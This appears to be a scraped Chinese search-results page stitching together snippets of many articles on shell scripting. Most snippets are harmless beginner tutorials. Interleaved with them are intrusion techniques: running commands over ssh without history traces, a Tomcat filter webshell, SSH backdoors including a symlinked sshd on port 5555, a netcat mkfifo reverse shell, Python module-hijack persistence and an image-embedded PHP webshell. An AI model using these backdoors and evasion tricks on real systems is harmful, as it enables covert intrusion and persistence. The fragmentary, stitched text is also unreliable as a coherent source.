0x01 无history记录执行命令 《Linux 应急响应手册》中,我曾介绍了三种不会在 history 中留下信息的场景,今天再介绍第四种 ssh 提供了一种登录不进入shell,直接执行命令的场景...连接服务器清空历史命令,并留下mark 2)Mac 下通过上述方式执行命令 3)Kali 通过 ssh 连接服务器,查看 history 可以看到, history 中并未记录我们执行的命令 0x02 不落地执行 shell...脚本 1....没有文件落地,执行了 shell 脚本 2. 有参数脚本 ssh root@192.168.1.1 "bash -s" < evil.sh "param" evil.sh 以下列代码为例 #!.../bin/bash echo "file name is $0" echo "param is $1" 没有文件落地,执行了需要传递参数的 shell 脚本
[TOC] Tomcat源代码调试看不见的 Shell 描述: 调试了 tomcat 从接收到一个socket, 到解析socket 并封装成Request 转发至 Jsp/Servlet 的全过程 Step1...WeiyiGeek. shell示例: <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding...随后任何带有 cmd 参数的请求都会被此过滤器拦下来,并执行 shell 命令,达到“看不见的 shell”的效果。
[TOC] Tomcat源代码调试看不见的 Shell 描述: 调试了 tomcat 从接收到一个socket, 到解析socket 并封装成Request 转发至 Jsp/Servlet 的全过程...一旦容器初始化已经结束,调用时就会出现异常: WeiyiGeek. shell示例: <%@ page language="java" contentType="text/html; charset...随后任何带有 cmd 参数的请求都会被此过滤器拦下来,并执行 <em>shell</em> 命令,达到“看不见的 <em>shell</em>”的效果。
一、专题背景 最近使用了个自动化平台(详见自动化运维平台Spug测试)进行每周的变更,效果很不错,平台将大量重复繁琐的操作通过脚本分发方式标准化自动化了,平台核心是下发到各个服务器的shell脚本,感觉有必要对...shell脚本做个总结,所以有了写本专题的想法。...本专题将结合运维实际介绍shell脚本的各项用法,预计10篇左右,将包括系统巡检、监控、ftp上传下载、数据库查询、日志清理、时钟同步、定时任务等,里面会涉及shell常用语法、注意事项、调试排错等。...使用ansible的script模块执行脚本dir_space_calc.sh,先进入远端服务器test157的/tmp目录,再执行脚本。...本文所有脚本和安装包文件已上传github:shell-scripts-03 更多请点击:shell专题
0x01 软连接后门 ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555; 参考链接如下: https://www.cnblogs.com/sevck.../p/6495884.html http://blackwolfsec.cc/2017/03/24/Linux_ssh_backdoor/ 0x02 SSH Wapper 后门 cd /usr/sbin...关于上面这行代码含义可以参考如下链接: https://docs.python.org/3/library/struct.html 0x03 ssh key 后门 在我们的攻击机中使用 ssh-keygen...这个是一种管理方式,所以文章非常多,无论你遇到权限问题,文件问题都能找到答案 0x04 修改openssh 主要是利用升级openssh修改源代码来进行留后门,网络上比较多的是 openssh-5.9p1...SSH后门到此结束!
shell脚本介绍: Shell脚本结构和执行: 开头(首行)需要加: #!/bin/bash 这里是指文件使用的是bash语法,通过/bin/bash解释器来执行的。 ...以#开头的行作为解释说明: 脚本的名字以.sh结尾,用于区分这是一个shell脚本 执行.sh脚本方法有两种: 1先给.sh脚本添加x权限: chmod +x 1.sh .sh脚本的绝对路径回车:.../root/1.sh 2bash(bash=sh)执行.sh脚本: bash 1.sh 查看脚本执行过程: sh -x 1.sh 检测shell脚本的语法错误: sh -n 1.sh date命令用法...month" //显示下一月的日期 date +%Y%m%d --date="-1 year" //显示前一年的日期 date +%Y%m%d --date="+1 year" //显示下一年的日期 shell...脚本中的变量: 1.
1.对于多次的网段进行封禁 2.加入定时任务,定期检查 #!/bin/bash #获取多次重复的网段 netstat -anptu |awk '{print $...
shell脚本,就是将一系列命令写在一个文档中,然后让shell从该文件读取命令,就像从终端读取一样。 1 基本知识 1.1 首行 #!/bin/sh 其中,#!...发音为shebang,该行后面可以写出任何想让shell实现的语句 1.2 行开头# 表示注释,shell会忽略一行中#之后的所有东西,可以用来解释难懂的部分 1.3 运行 创建好脚本,并设置好权限,...就可以将这个脚本放在某个目录中,来运行 比如当前目录下 ..../script chmod +rx script shell脚本对批处理等很有用,但是对复杂的运算和控制结构等,还是python perl或awk等。
文章目录 1. shell 概述 1.1 shell 和 shell 脚本 1.2 Shell 脚本应用场景 1.3 Linux 中的 shell 类型 1.4 脚本实例 2. shell 脚本编程基础...shell 脚本(shell script),是一种为 shell 编写的脚本程序。业界所说的 shell 通常都是指 shell 脚本,shell 和 shell script 是两个不同的概念。...2. shell 脚本编程基础 2.1 脚本调试 只检测脚本中的语法错误,无法检查出命令错误,不真正执行脚本 bash -n /path/to/script.sh 调试并执行 bash -x /path...因此,本地变量的作用范围是当前 shell 脚本程序文件,包括脚本中的函数 环境变量:当前 shell 和子 shell 有效 本地变量:函数的生命周期结束时变量被自动销毁 注意: 如果函数中定义了普通变量...数组 Shell 数组操作 Shell 脚本数组用法小结 Shell 数组(详细) 版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。
脚本 通过Shell命令或程序编程语言编写的Shell文本文件, 这就是Shell脚本 , 也叫Shell程序 为什么学习Shell脚本?..., 全局环境变量时所有的Shell程序都可以读取的变量, 效果 Shell脚本文件编写规范 脚本文件后缀名规范 shell脚本文件就是一个文本文件, 后缀名建议使用 .sh 结尾 首行格式规范 首行需要设置...shell脚本HelloWord入门案例 需求 创建一个Shell脚本文件helloworld.sh,输出hello world字符串 效果 实现步骤 1、创建shell脚本文件 touch helloworld.sh...介绍: 就是利用sh命令执行脚本文件, 本质就是使用Shell解析器运行脚本文件 bash解析器执行方式 语法: bash 脚本文件 介绍: 就是利用bash命令执行脚本文件, 本质就是使用Shell.../脚本文件 介绍: 执行当前目录下的脚本文件 注意: 脚本文件自己执行需要具有可执行权限, 否则无法执行 3种方式的区别 sh或bash执行脚本文件方式是直接使用Shell解析器运行脚本文件,
---- Shell 脚本 Shell 脚本(shell script),是一种为 shell 编写的脚本程序。...业界所说的 shell 通常都是指 shell 脚本,但读者朋友要知道,shell 和 shell script 是两个不同的概念。...由于习惯的原因,简洁起见,本文出现的 "shell编程" 都是指 shell 脚本编程,不是指开发 shell 自身。...告诉系统其后路径所指定的程序即是解释此脚本文件的 Shell 程序。...php 写 shell 脚本,扩展名就用 php 好了。
Common uses include: · simple TCP proxies · shell-script based HTTP clients...establishes a connection successfully to that port, /bin/sh gets executed on ‘server’ side and the shell...https://www.cnblogs.com/old-path-white-cloud/p/11685558.html 本来我对自己的Linux知识还是挺有信心的,不过最近研究了这些 Linux 后门之后发现我竟然对这些命令有些犹豫...,我们希望的是反弹shell,简单变个型吧: rm -f /tmp/f; mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.38 5555...> /tmp/f ---- 本来我想如果加上 -k 选项是不是可以做一个持久后门,经过尝试, 加上 -k 只能保证端口开放,没有办法保持命令执行 如果你遇到的nc 有 -e 或者 -c 选项,可以尝试
1 Shell 脚本Shell 脚本是运行在 shell 环境中的脚本语言,用于自动执行重复性任务、管理系统配置、以及通过编写脚本和运行脚本来执行一系列命令。...shell 脚本可以帮助我们完成系统管理、软件安装、文件操作等需求。Shell 脚本文件以 .sh 作为扩展名,基本语法如下:#!...可以使用以下命令查看系统使用、支持的 shell:echo $SHELL:显示当前使用的 shell 类型cat /etc/shells:显示操作系统中可用的 shell 类型3 执行 Shell 脚本可以通过以下方式使用...shebang 指定的 shell 执行脚本:第一种方式,使用 sh 命令:sh script_file.sh第二种方式,通过相对路径或绝对路径:首先为脚本文件添加可执行权限chmod +x script_file.sh...比如输入用户名 weiwendi 为 shell 脚本中 username 变量赋值:#!
业界所说的 Shell 通常都是指 Shell 脚本,但要知道,Shell 和 Shell Script 是两个不同的概念。...不同 Shell 脚本的区别就是语法不一样。 总结:我们通过编写 Shell 脚本,然后放在 Shell 应用程序里面运行,常见的 Shell 应用程序有 Cmd、git Bash 等等。...常见的Shell 脚本有 Bash、Node。...不同的 Shell 脚本需要不同的 Shell 应用程序来执行,默认 Shell 应用程序都是执行 Bash 脚本的,如果需要切换 Node 脚本的执行环境,我们需要安装 Node,配置完成环境变量后,...---- Shell 脚本 - Bash Bash 是大多数 Linux 系统默认的 Shell 脚本。
1、shell:命令解释器 1)可支持的shell保存在/etc/shells中 2)默认shell为/bin/bash 2、shell脚本编写: 1)使用vi编辑器 2)每行一条命令,依次执行 3...)赋予可执行权限(x) 3、执行方式: 1)脚本文件路径:有两种,相对和绝对路径,必须有x权限 2)Sh脚本文件路径:无须x权限,相对和绝对路径都可以,在子shell上 3)Source(或 .)脚本文件路径...:无须x权限,在当前sell执行 4、脚本组成: 1)脚本声明:指定脚本执行的shell,以#!...:当前用户的shell 5)HOME:当前用户的宿主目录 6)HISTSIZE:记录的历史命令数,默认为1000条 7)UID:当前用户ID 9、位置变量:命令参数的位置,由$1~$9代表,第一个到第九个...:上一条命令执行后的结果,正常代表0,非0值表示异常或出错 4)$0:代表脚本本身 其他命令: Date +%Y 年 Date +%Y-%m 年月 Date +%Y-%m-%d 年月日
业界所说的 Shell 通常都是指 Shell 脚本,但要知道,Shell 和 Shell Script 是两个不同的概念。...不同 Shell 脚本的区别就是语法不一样。 总结:我们通过编写 Shell 脚本,然后放在 Shell 应用程序里面运行,常见的 Shell 应用程序有 Cmd、git Bash 等等。...常见的Shell 脚本有 Bash、Node。...不同的 Shell 脚本需要不同的 Shell 应用程序来执行,默认 Shell 应用程序都是执行 Bash 脚本的,如果需要切换 Node 脚本的执行环境,我们需要安装 Node,配置完成环境变量后,...Shell 脚本 - Bash Bash 是大多数 Linux 系统默认的 Shell 脚本。
shell脚本中 '$' 与不同的符号搭配其表示的意义也会不同 特殊标志符 含义 $0 当前脚本的文件名 $n 传递给脚本或函数的参数。n 是一个数字,表示第几个参数。...例如,第一个参数是$1,第二个参数是$2 $# 传递给脚本或函数的参数个数 $* 传递给脚本或函数的所有参数 $@ 传递给脚本或函数的所有参数 $?...上个命令的退出状态 $$ 当前Shell进程ID $() 与 `(反引号) 一样用来命令替换使用 ${} 引用变量划分出边界 注释:$* 和 $@ 都表示传递给函数或脚本的所有参数,不被双引号(" "
-c选项时,请在执行脚本或命令后进入交互模式。...-m module_name 这个参数是在sys.path 中查找模块名,并将其作为脚本执行 听到这里,相信大家已经对于这个参数的限制有了一定的了解,我们来看一下 sys.path 包含哪些内容 ?...,python3 在引入模块的时候,是按照 sys.path 的顺序来进行查找的,我们来测试一下是不是这样的 在 /usr/lib/python3.5/ 、/usr/lib/python3.5/plat-x86...所以思路来了: 要保证我们后门的名字和模块的名字一样 我们的后门路径要优先被索引 最好名称能正常一点或者以 ....纵观默认的整个 sys.path ,好像只有两个是比较适合留shell的(每个人对这个后门的想法多少还是有点不一样) _sysconfigdata_m.py lsb_release.py 我们还是使用
ShellScript,Shell脚本与Windows/Dos下的批处理类似,也便是用各类指令预先放入到一个文件中,便利一次性执行的一个程序文件,主要是便利办理员进行设置或许办理用的。...shell编程100例 1、编写helloworld脚本 #!/bin/bash #编写helloworld脚本 echo”HelloWorld!” 2、经过方位变量创立Linux系统账户及暗码 #!.../bin/bash #经过方位变量创立Linux系统账户及暗码 #1是履行脚本的第一个参数,2是履行脚本的第二个参数 useradd”$1″ echo”2″|passwd‐‐stdin”1″ 3、备份日志.../bin/bash #每周5运用tar命令备份/var/log下的所有日志文件 #vim/root/logbak.sh #编写备份脚本,备份后的文件名包括日期标签,防止后面的备份将前面的备份数据掩盖 #.../bin/bash #一键布置LNMP(RPM包版别) #运用yum安装布置LNMP,需要提早装备好yum源,否则该脚本会失利 #本脚本运用于centos7.2或RHEL7.2 yum‐yinstallhttpd
> 生成WEB图片马的方法: 方式1:采用图片和文本的形式融合一句话: copy test.png/b+shell.php 2.jpg #意思是将test.jpg以二进制与shell.php合并成
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
实时音视频
对象存储
即时通信 IM
